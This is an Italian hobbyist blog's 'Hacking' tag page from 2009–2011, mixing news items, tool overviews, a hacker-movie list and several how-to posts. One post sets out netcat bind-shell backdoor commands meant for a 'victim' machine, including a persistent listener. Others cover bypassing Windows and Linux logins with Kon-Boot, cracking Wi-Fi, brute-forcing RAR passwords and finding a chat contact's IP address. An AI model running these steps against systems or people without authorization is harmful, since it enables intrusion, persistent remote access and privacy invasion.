Visualizzazione post con etichetta Hacking. Mostra tutti i post
Visualizzazione post con etichetta Hacking. Mostra tutti i post

domenica 27 marzo 2011

Sony offre lavoro all'hacker Koushik Dutta, ma lui rifiuta.

Ormai assumere gli hacker è una tattica assodata, ma questa volta non è andata bene per la Sony ormai presa di mira dagli hacker di tutto il mondo.


Ecco qual è il motto delle grandi aziende:  " Se non puoi sconfiggerli... ingaggiali! ". Gli studi di SCEA (Sony Computer Entertainment of America) hanno offerto un posto come Software Engineer al noto hacker Koushik Doutta.



venerdì 24 settembre 2010

A Digital Media Primer For Geeks: video-lezioni sui media digitali

Xiph.Org ha pensato bene di pubblicare una serie di video-lezioni per insegnare ai "geeks" le nozioni basi dei media digitali e sulle tecnologie che vi girano attorno.


Di recente è stato pubblicato il primo capitolo (con sottotitoli in inglese o in francese), di questa serie chiamata “A Digital Media Primer For Geeks” che tratta dei fondamenti di video ed audio: come vengono codificati e spiegazioni molto su concetti come campionamento, canali, gamma e spazio colore.



domenica 29 agosto 2010

Guida a Nmap: port scanner

Nmap (Network Mapper) è un port scanner open source per la network exploration e l'auditing.

Output di una scansione con Nmap
L'output di Nmap è uno scan di un elenco di obbiettivi, con informazioni supplementari per ognuno a seconda delle opzioni usate. Tra queste informazioni è interessante la tabella delle porte interessanti : che elenca il numero della porta e il protocollo, il nome del servizio, e lo stato attuale.



sabato 28 agosto 2010

Trucchi Travian hack: guida agli Scipts

Inanzitutto per chi non conoscesse questo gioco, Travian è uno dei più famosi browser games gratuiti il cui scopo è quello di creare un villaggio di una determinata civiltà e portarlo alla fioritura. Potrete stringere alleanze con i villaggi adiacenti conquistarli o distruggerli.

Per questo gioco non esistono veri e propri trucchi, in quanto trovare dei bug nei server di Travian è un impresa molto ardua !

Ma per fortuna c' è chi ha pensato bene di creare degli Scripts!



lunedì 2 agosto 2010

Bypassare la limitazione "This video is not available in your country" su Youtube

Vi è mai capitato di voler accedere ad un video di youtube ma vi è apparsa questa immagine ? Questo accade quando un video è accessibile solo a determinati Paesi, per volere del proprietario del video.


Oggi vi svelo il metodo più semplice e veloce per bypassare questo blocco:
  • Aprite il sito che non riuscite a visualizzare e guardate l'URL.
    Esempio: http://www.youtube.com/watch?v=3GA1PR0-Vdw


  • Adesso basta sostituire "watch?v=" con "v/" ed il gioco è fatto.
    Esempio: http://www.youtube.com/v/3GA1PR0-Vdw





mercoledì 28 luglio 2010

The Hacker Manifesto - Il manifesto hacker di The Mentor

Il Manifesto Hacker ( noto anche come The Hacker Manifesto o The Conscience of a Hacker ) è un saggio scritto da The Mentor (hacker statunitense) dopo l' arresto e considerato una pietra miliare della cultura hacker.
Nel manifesto tradotto ormai in molte lingue tra cui l' italiano, spiega le  motivazioni che portano un ragazzo a diventare hacker.

The Hacker Manifesto
Un altro è stato preso oggi, è su tutti i giornali. "Adolescente arrestato nello scandalo del crimine informatico", "Hacker arrestato dopo aver tentato di manomettere una banca"... Maledetti ragazzi. Sono tutti uguali. 




venerdì 23 luglio 2010

Hacker games: giochi per aspiranti hacker

Gli Hacker Games sono dei "rompicapi" rivolti agli esperti del web (hacker o meno), a chi conosce a fondo le problematiche e le vulnerabilità del web.

In questi giochi non sono presenti algoritmi, crittografia, steganografia, reverse engineering o cose del genere, bensì una serie di livelli, ognuno dei quali simula una pagina di un sito web: starà a te capire quale vulnerabilità sfruttare per portare a termine le missioni che ti verranno proposte.

Qui di seguito ho raccolto una lista della maggior parte degli Hacker games trovati sul web:




domenica 18 luglio 2010

Google hackerato! Cerchi Vatican ed esce pedofilo



(ANSA) - ROMA, 17 LUG - Attacco degli hacker a Google: inserendo 'vatican' sulla stringa del motore di ricerca si ottiene il link 'www.pedofilo.com'. L'item, il primo dei risultati, e' legato al sito della Santa Sede (The Holy See). I responsabili del sito ufficiale del Vaticano hanno segnalato l'anomalia a Google, che sta lavorando per eliminarla, come ha fatto sapere il direttore della sala stampa vaticana, padre Federico Lombardi, auspicando che l'inconveniente possa essere presto risolto.

Fonte: http://www.ansa.it/


lunedì 12 ottobre 2009

Hackerato Poste.it

Un attacco informatico, da parte di hacker che potremmo definire “buoni”, è stato effettuato oggi ai danni del sito poste.it, il portale di Poste Italiane. Questo quello che appariva oggi, prima che Poste bloccasse l’accesso al sito..

poste  hacker

I pirati informatici hanno in questo modo voluto dimostrare a milioni di italiani che il sito delle Poste Italiane e soprattutto i dati di milioni di clienti sono tutto tranne che al sicuro. Ecco quanto riportava il pop-up che appariva nella homepage:

“Perché questo atto di forza? Per dimostrare a milioni di italiani che i loro dati sensibili non sono al sicuro! Sembra pazzesco eppure tutta la sicurezza garantita nei servizi online di e-commerce è solamente apparente .. Per vostra fortuna noi siamo persone non malintenzionate, perciò i vostri dati e i vostri accounts non sono stati toccati; ma cosa succederebbe se un giorno arrivasse qualcuno con intenzioni ben peggiori delle nostre? Con questo gesto quindi invitiamo i responsabili a occuparsi della grave mancanza di sicurezza nei servizi online delle Poste s.p.a.”.

I milioni di correntisti possono tirare un sospiro di sollievo.. e ringraziare questi pirati, grazie ai quali forse Poste Italiane si impegnerà a rendere più sicuro il proprio portale web. Dopo un evento del genere non rimane che un dubbio: e il portale web della nostra banca di fiducia o della nostra carta di credito sono sicuri?

Fonte qui




martedì 15 settembre 2009

Come accedere a Windows o Linux senza conoscere la password

Per proteggere il computer e quindi la vostra privacy, molto spesso capita di inserire una password all' avvio del sistema così da non permettere ad altre persone di accedere senza il vostro consenso.

Per cambiare la password basta essere dentro il sistema, ma come recuperarla nel caso l' abbiate dimenticata e il computer è spento?


La soluzione è Kon-Boot è un software in grado di permettere l’accesso a sistemi senza la necessità di utilizzo di password.
-Su Linux consente di accedere come root senza conoscere la password o permette di fornire i privilegi di root per l’utente corrente.
-Su Windows permette di entrare in un qualsiasi profilo protetto senza bisogno di conoscere la password.

Il procedimento è semplicissimo:

* Scaricare il file ISO di Kon-Boot da qui e masterizzarlo su un CD.
* Inserire il CD di Kon-Boot, appena masterizzato, e avviare il computer da CD-ROM.
* Alla schermata di login kryptos premere Invio per continuare.
* Dopo vari controlli del sistema, Windows verrà avviato.
* Alla schermata di accesso qualsiasi password verrà inserita sarà accettata dal sistema.

Questo programma non modifica alcun file né password ma bypassa il sistema di riconoscimento dell’utente non lasciando alcuna traccia dopo il riavvio.

N.B: Ovviamente questa guida è stata postata solo in caso di smarrimento della password del proprio Pc, dato che è illegale entrare in Pc protetti da password.


venerdì 4 settembre 2009

Craccare una rete Wi-fi in modo semplice da interfaccia grafica

Hai mai provato a seguire le guide su internet che ti insegnano a craccare una rete Wi-fi da terminale??
Se non ci sei mai riuscito perchè li trovavi troppo complesse, adesso c' è la soluzione :)



Infatti da oggi potrai sfruttare Aircrack con interfaccia grafica. L’interfaccia è stata sviluppata da BUC (Basta un Click) e ti permette di eseguire tutte le operazioni per craccare la rete wifi senza utilizzare il terminale !

Clicca qui per leggere la guida.

N.B: ti ricordo che trovare la password di una rete wi-fi protetta è illegale, quindi fai un buon uso della guida ;)


mercoledì 2 settembre 2009

Guida a netcat: il "coltellino svizzero della rete"

Per chiunque si sia addentrato nel mondo del networking, è impossibile non essersi imbattuto in netcat.
Questo piccolo programmino permette di fare veramente tante cose, ma se proprio volessimo darne una definizine, si può dire che è una utility che legge e scrive dati utilizzando connessioni tcp/ip.


Con esso è possibile :
  • Aprire o leggere connessioni sia tcp o udp su o da qualsiasi porta.
  • Effettuare delle connessione in "tunnel mode".
  • Effettuare delle scansioni sulle porte, anche in modalità random.
  • Uso vanzato con l'invio in modalità buffer (per esempio inviare una riga ogni N secondi conservando i dati da inviare in un buffer) e un hexdump dei dati trasmessi o ricevuti da reindirizzare eventualente su un file.






martedì 1 settembre 2009

I 10 hacker più famosi della storia

Il sito internet ITsecurity.com ha stilato un elenco dei 10 hacker più famosi mai esistiti, classificandoli secondo le due macro categorie all'interno delle quali vengono tradizionalmente suddivisi: i Black Hat Cracker e i White Hat Hacker.


Adrian Lamo, Kevin Mitnick e Kevin Poulsen

I Black Hat Cracker sono gli hacker “in cattiva fede” , ovvero personaggi caratterizzati da notevole abilità e finalità illecite. La violazione della privacy da loro praticata all'interno dei sistemi è spesso venduta come amore per la libertà e l'accessibilità; altre volte il loro scopo è invece dichiaratamente speculativo.

I White Hat Hacker viceversa utilizzano le loro competenze per scopi positivi, alcuni di loro sono responsabili delle più grandi invenzioni in ambito informatico e spesso vengono assunti dalle aziende per testare l'impenetrabilità dei solo sistemi.

I primi 5 Black Hat Cracker sono Jonathan James, Adrian Lamo, Kevin Mitnick, Kevin Poulsen e Robert Tappan Morris.

Jonathan James fu il primo minorenne ad essere giudicato per un cybercrimine: aveva infatti solo 16 anni, ma era riuscito a “crackare” organizzazioni del calibro della NASA e della DTRA (Defense Threat Reduction Agency).

Adrian Lamo è di certo quello che ha fatto ammattire il maggior numero di amministratori. Da Microsoft a Yahoo!, passando da Sun Microsystems, MacDonald, Cingular, AOL, e persino il New York Times. Si ritiene che Lamo abbia portato a termine tutti i tipi di intrusioni e violazioni, aggirando le protezioni con una semplicità disarmante: durante un'intervista, nello spazio informativo serale della NBC, gli venne chiesta una dimostrazione pratica delle sue capacità; rispose entrando nella rete della NBC in meno di cinque minuti. Oggi è un esperto di sicurezza, ed un uomo libero, dopo essere stato sotto sorveglianza per molti anni.

Kevin Mitnick, il più famoso, e senz'altro anche il più dotato, hacker della storia si rese noto nel 1981, alla tenera età di 17 anni, penetrando in un server telefonico, e reindirizzando le chiamate a suo piacere. Nel 1983 ottenne il suo primo grande successo, e anche il suo primo arresto, quando penetrò in un computer del Pentagono. I suoi attacchi ripetuti lo resero un bersaglio per l'FBI. Fu condannato a cinque anni di prigione negli anni '90, ma oggi è un consulente di sicurezza e possiede una società propria: Mitnick Security.

Kevin Poulsen “Dark Dante” è noto per il suo attacco nei confronti delle linee telefoniche della KIIS-FM, stazione radiofonica di Los Angeles, assumendone il totale controllo.

Robert Tappan Morris è diventato famoso per aver inventato per errore quello che è considerato il primo virus dei computer su Internet, il Morris Worm del 1988.

I primi 5 White Hat Hacker sono Stephen Wozniak, Tim Berners-Lee, Linus Torvalds, Richard Stallman e Tsutomu Shimomura.

Stephen Wozniak “the Woz” nel 1976 fu il fondatore della Apple insieme a Steve Jobs e il progettista del computer Apple I.

Tim Berners-Lee è uno degli inventori del World Wide Web (WWW), fu colui che ne coniò il nome, ne sviluppò il primo server e il primo programma client; sviluppò inoltre una prima versione dell'odierno linguaggio HTML.

Linus Torvalds è il “papà” del kernel Linux, sistema operativo opensource, del quale ha ideato e sviluppato la prima versione.

Richard Stallman è pioniere della battaglia a favore del software libero, creatore del sistema operativo pubblico GNU; attualmente sono molto diffusi i sistemi GNU-Linux, varianti del sistema GNU basate su Linux.

Tsutomu Shimomura diventò famoso in seguito alla sua collaborazione con l'FBI finalizzata all'arresto di Kevin Mitnick, del quale lui stesso era stato vittima.

Inoltre non possiamo dimenticarci di John Draper, conosciuto anche come "Cap'n Crunch", Draper fu uno dei primi hacker della storia. Il soprannome viene da una marca di cereali, all'interno dei quali trovò un fischietto giocattolo. Scoprì che il fischietto serviva anche per ottenere telefonate gratuite, bastava emettere un certo tono al momento giusto. Fu arrestato nel 1976, e condannato a due mesi.





venerdì 28 agosto 2009

Creare una backdoor con Netcat

Cos’è una backdoor? Una “porta di servizio” che permette l’amministrazione remota del computer.

In genere dopo aver ottenuto l’accesso al computer l’hacker ha la necessità di tornare nel sistema in modo più agevole, oppure ha bisogno di un’interfaccia a linea di comando (shell) con la quale poter agire comodamente.

Per attivare netcat come backdoor usiamo il seguente comando (sul computer della vittima):

nc -l -p 9999 -vv -e cmd.exe

Vediamo nel dettaglio. Il parametro -l dice a netcat di “ascoltare” sulla porta Tcp indicata dal parametro -p, in questo caso 9999 (valore arbitrario). Il cuore della tecnica è il parametro -e, che seguito da cmd.exe istruisce netcat a eseguire (-e ovvero exec) il comando specificato (cmd.exe, la shell di Windows) veicolando l’input/output attraverso netcat stesso.

Come ci si collega ad un host su cui è stata messa questa backdoor? Ma naturalmente con netcat!
Se il computer sotto controllo ha come indirizzo Ip 192.168.0.1, otterremo l’accesso remoto con il comando:

nc 192.168.0.1 9999 -vv

ci troveremo di fronte al prompt dei comandi di Windows; solo che questo prompt non è della nostra macchina, ma quello della macchina remota!
Per uscire dalla backdoor basta semplicemente digitare exit e la connessione si chiude. E qui c’è un problema.

Una volta chiusa la connessione in netcat remoto smette di ascoltare, semplicemente termina l’esecuzione; quindi non sarà più possibile collegarsi da remoto. Per aggirare questo problema ci viene in soccorso il parametro -L.

nc -L -p 9999 -vv > trojan <– notare la L maiuscola al posto di -l

Il parametro -L istruisce netcat a mantenere aperta la porta e restare in ascolto anche quando il programma eseguito con il comando -e viene interrotto. Così si potrà entrare e uscire dal sistema a piacere.

Un avvertimento necessario: questa tecnica è pericolosissima! Aprire una backdoor in questo modo, aprire una shell senza la protezione di una password è quasi un suicidio, significa spalancare una porta del sistema a chiunque. Se lo fate su un vostro sistema, se proprio dovete farlo, fatelo per periodi brevissimi e su porte non standard o non facilmente intuibili (9999 e 12345 non vanno benissimo).

Fonte: www.pillolhacking.net




giovedì 27 agosto 2009

Scoprire password di un archivio rar

Molto spesso scaricando da Emule capita che si scarichino dei file compressi, quindi con estensione rar o zip che sono protetti da password, oppure semplicemente cercando di proteggere dei nostri file abbiamo impostato una password che non ci ricordiamo;

Beh in ogni caso vediamo di risolvere questo problema! In linea di massima quando il file proviene da programmi P2P (come Emule ad esempio) la password è lo stesso nome del file, oppure il nome del file contiene un link da dui sarà possibile prendere la password, se però neanche questo è il nostro caso provvediamo a usare un metodo un pò meno ortodosso :-)


Se non conosciamo proprio la password ci può venire in aiuto il programma Advanced RAR Password Recovery. Questo programma è in grado di scoprire la password di un file RAR con due tecniche:

La prima è il “Brute Force”, ovvero la prova di tutte le combinazioni possibili di lettere, numeri e simboli, con una lunghezza massima che potete impostare a vostro piacimento. La durata di questa operazione più essere anche molto lunga, a seconda della complessità della password!

La seconda è definita “dizionario”, ed è la prova di tutte le parole contenute in un file di testo.

Per scaricare Advanced RAR Password Recovery CLICCA QUI

Fonte: http://www.computertrucchi.com




martedì 25 agosto 2009

Recuperare password Msn con MessenPass

Capita molto spesso che avendomolti indirizzi e-maile varie password da ricordare si scordi la password per entrare in Msn messenger! Che fare ?

Se la password è celata dietro agli asterischi e la teniamo salvata possiamo ancora recuperarla :) senza tanto sforzo!


password_msn

Questo programma che vedete nell’immagine sopra permette, semplicemente aprendolo (quindi senza installarlo), di scoprire la password di msn, e degli altri istant messenger sotto gli asterischi!

Quindi se per mesi e mesi siete entrati in msn messenger premendo semplicemente il tasto connetti perchè avevate la password salvata e ora per qualsiasi motivo vi occorre potete recuperarla senza problemi!

Scaricate Messenpass CLICCANDO QUI

Oppure visita la pagina del produttore CLICCANDO QUI http://www.nirsoft.net

Mi raccomando usatelo solo sul vostro di messenger, non fate i furbi :) !




Scoprire indirizzo IP tramite Msn

Per trovare l' IP di un altro computer esistono moltissimi modi. Oggi vi spiegherò come scoprire un indirizzo IP tramite Msn.

Per poter scoprire l’indirizzo IP di un nostro contatto MSN è necessario avviare con esso un tipo di connessione diretta; La semplice conversazione non basta in quanto passa tutto prima per i server di MSN; Quindi per scoprire l’IP del contatto con cui stiamo parlando è necessario inviare un qualsiasi file alla vittima.

Durante il trasferimento eseguite questi passaggi:

Dovete aprire il “Prompt dei comandi” che potete trovare in “Start / Tutti i programmi / Accessori / Prompt dei comandi” e digitare all’interno il comando “Netstat -na” (senza apici) e premere invio.

Comparirà una lista di indirizzi ip, sotto la colonna “Indirizzo locale” c’è il vostro ip, sotto la colonna “Indirizzo esterno” sono elencati gli indirizzi IP con cui il vostro computer stà interagendo, e sotto la colonna “Stato” appunto lo stato della connessione, ovvero le è stabilita, in attesa eccetera.

Dovete cercare nella colonna stato la dicitura “SYN SENT”, l’ip che trovate sotto la colonna “indirizzo esterno” nella solita riga sarà l’indirizzo IP del contatto a cui stati inviando il file :)





mercoledì 19 agosto 2009

Film Hacker in streaming

Oggi voglio elencarvi una serie di film che parlano di Hacker e informatica :)
Vi posto il link diretto a Megavideo (o Veoh) di ogni film così potete vederli direttamente in streaming:



- Hackers
- Hackers 2
- I pirati della Silicon Valley
- Revolution OS
- Synapse
- Codice Swordfish
- Matrix
- Matrix Reloaded
- Matrix Revolutions
- Tron
- La rivincita dei nerds
- Il tredicesimo piano
- Nirvana
- Wargames
- Wargames 2 - parte 1 - parte 2
- Firewall, accesso negato
- Johnny Mnemonic
- Ghost in the Shell
- Il tagliaerbe
- Il tagliaerbe 2
- I Signori della Truffa
- The Net - Intrappolata nella rete
- eXistenZ
- Avalon
- Takedown

Mi ci è voluto un pò, ma ecco la lista completa ( o quasi )
Se ne ho saltato qualcuno ditemelo che provvederò ad inserirlo :)


domenica 9 agosto 2009